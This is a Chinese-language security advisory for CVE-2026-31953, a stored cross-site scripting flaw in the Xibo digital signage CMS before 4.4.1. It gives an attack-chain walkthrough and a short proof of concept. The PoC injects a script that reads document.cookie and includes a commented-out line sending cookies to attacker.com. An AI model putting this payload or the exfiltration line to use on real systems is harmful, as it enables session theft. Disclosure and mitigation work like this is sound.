CVE-2026-31953 CVSS 6.4 中危

CVE-2026-31953 Xibo存储型跨站脚本漏洞

披露日期: 2026-04-24

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-31953

漏洞类型

存储型跨站脚本 (Stored XSS)

CVSS评分

6.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Xibo Digital Signage Platform

漏洞概述

Xibo开源数字标牌平台4.4.1之前版本存在存储型XSS漏洞。具有通知创建权限的认证用户可在通知正文中注入恶意脚本。当通知设为“中断”模式时，脚本将在目标用户登录时自动执行，无需交互。攻击者可借此窃取会话凭证或执行未授权操作。

技术细节

该漏洞源于Xibo CMS在处理通知内容时对用户输入的过滤机制存在缺陷。攻击者需要具备特定的权限组合：访问通知中心以及使用“添加通知”按钮的权限，这些权限通常默认仅授予管理员用户。利用该漏洞时，攻击者首先登录系统，通过通知管理界面创建新通知。在编辑通知正文时，攻击者注入恶意的JavaScript代码。最关键的利用步骤是将该通知属性设置为“Interrupt”（中断）。在此配置下，系统会强制向用户展示该通知，且无需用户进行任何点击或确认操作（UI:N）。当任何拥有查看通知权限的目标用户登录系统时，存储在服务端的恶意脚本即被加载并在其浏览器上下文中自动执行。由于漏洞影响范围被标记为S:C（Scope Changed），攻击者可以利用受害者的会话令牌访问系统中的其他功能，造成数据泄露或完整性破坏。

攻击链分析

STEP 1

权限获取

攻击者获得具有通知中心访问权及“添加通知”权限的认证账户（通常为管理员权限）。

STEP 2

Payload注入

攻击者利用“添加通知”功能，在通知正文字段中注入恶意的JavaScript代码。

STEP 3

设置触发条件

攻击者将通知类型配置为“Interrupt”（中断），确保通知在目标用户登录时强制弹出。

STEP 4

存储与等待

恶意通知被存储在数据库中，攻击者等待具备查看通知权限的目标用户登录系统。

STEP 5

自动执行

目标用户登录时，系统自动加载并渲染中断通知，导致恶意脚本在用户浏览器中无交互执行。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!--
PoC: Stored XSS via Notification Body
1. Login as Admin.
2. Navigate to Notification Centre.
3. Click "Add Notification".
4. Paste the payload below into the body.
5. Set the notification type to "Interrupt".
6. Save and wait for a target user to login.
-->
<script>
    alert('CVE-2026-31953 PoC Execution: ' + document.cookie);
    // Potential data exfiltration
    // new Image().src="http://attacker.com/?c="+document.cookie;
</script>

影响范围

Xibo < 4.4.1

防御指南

临时缓解措施

对于无法立即升级的用户，建议撤销不可信用户的“通知中心”访问权限和“添加通知”按钮的使用权限，以减少攻击面。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表